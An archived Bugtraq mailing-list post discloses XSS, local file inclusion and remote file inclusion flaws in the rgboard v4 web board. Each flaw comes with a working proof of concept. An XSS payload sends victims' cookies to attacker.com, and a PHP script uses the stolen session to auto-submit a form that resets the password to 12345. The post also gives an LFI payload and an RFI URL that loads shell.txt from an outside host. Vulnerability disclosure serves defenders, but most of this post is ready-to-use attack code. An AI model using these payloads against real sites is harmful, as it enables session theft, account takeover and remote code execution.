rgboard v4 (07.07.27) Multiple Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: rgboard v4 (07.07.27) Multiple Vulnerability
From: make0day@xxxxxxxxx
Date: Sun, 1 Feb 2009 21:24:18 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

/***************************
XSS Vulnerability

/wrtie.php

..

$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html 
use'.

*************************/

poc:

Inject XSS tag : 
<img src = "http://attacker.com"; 
onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi
 there! :)

/rghunter.php - Makes password as 12345

<?php
  extract($_GET);
  
  $url = eregi_replace("http://","",$l);

  $chk = 0;

  for($i = 0; $i < strlen($url); $i++)
  {
        if($url[$i] == '/')
        {
                $chk = $i;
        }
  }
  for($i = $chk; $i < strlen($url); $i++)
  {
        $url[$i] = "";
  }

  $url = $url."/../rg4_member/modify.php";
  setcookie($c);
?>

<form action = "http://<?=$url ?>?" method = "post" name = "member_info">
<input type="hidden" name="form_mode" value="member_modify_ok">
<input type="hidden" name="ret_url" value="../main/index.php">
<input type="hidden" name="mb_pass" value="12345">
<input type="hidden" name="mb_pass1" value="12345">
<input type="hidden" name="mb_nick" value="hacked">
<input type="hidden" name="mb_email" value="attacker@xxxxxxxxxx">
<input type="hidden" name="mb_tel11" value="062">
<input type="hidden" name="mb_tel12" value="1234">
<input type="hidden" name="mb_tel13" value="1234">
<input type="hidden" name="mb_tel21" value="010">
<input type="hidden" name="mb_tel22" value="123">
<input type="hidden" name="mb_tel23" value="1234">
<input type="hidden" name="mb_signature" value="hacked">
<input type="hidden" name="mb_introduce" value="hacked">
</form>
<script>
document.member_info.submit();
</script>

/***************************
Local File Inclusion Vulnerability

/_footer.php

        if(file_exists($skin_path."footer.php")) 
include($skin_path."footer.php"); //File inclusion

*************************/

poc:

//yeah, there is a problem.. file_exists()!
//How can we bypass it? I don`t know :)
//If we have account in same server with target, we can attack his board easily
//Here is the example :

http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/


/tmp/footer.php
<?
$d = dir("/tmp");
echo "Handle: " . $d->handle . "\n";
echo "Path: " . $d->path . "\n";
while (false !== ($entry = $d->read())) {
   echo $entry."\n";
}
$d->close();
?>

//Yeah, It is good, But when we don`t account in that server, How we can beat 
target?
//We can find a clue from php.net
//On windows, use //computername/share/filename or 
\\computername\share\filename to check files on network shares.
//As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer 
to List of Supported Protocols/Wrappers
//for a listing of which wrappers support stat() family of functionality.
//Do you find clue too? :-O
 

/***************************
Remote File Inclusion Vulnerability

/footer.php

                </td>
        </tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>

..

include($_path['counter']."rg_counter.php"); ?> //File inclusion

*************************/

poc:

http://test.com/RGboard/include/footer.php?_path[counter]=http://attacker.com/shell.txt?

Prev by Date: DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal
Next by Date: phpslash <= 0.8.1.1 Remote Code Execution Exploit
Previous by thread: DDIVRT-2008-19 HP JetDirect Web Administration Directory Traversal
Next by thread: phpslash <= 0.8.1.1 Remote Code Execution Exploit
Index(es):
- Date
- Thread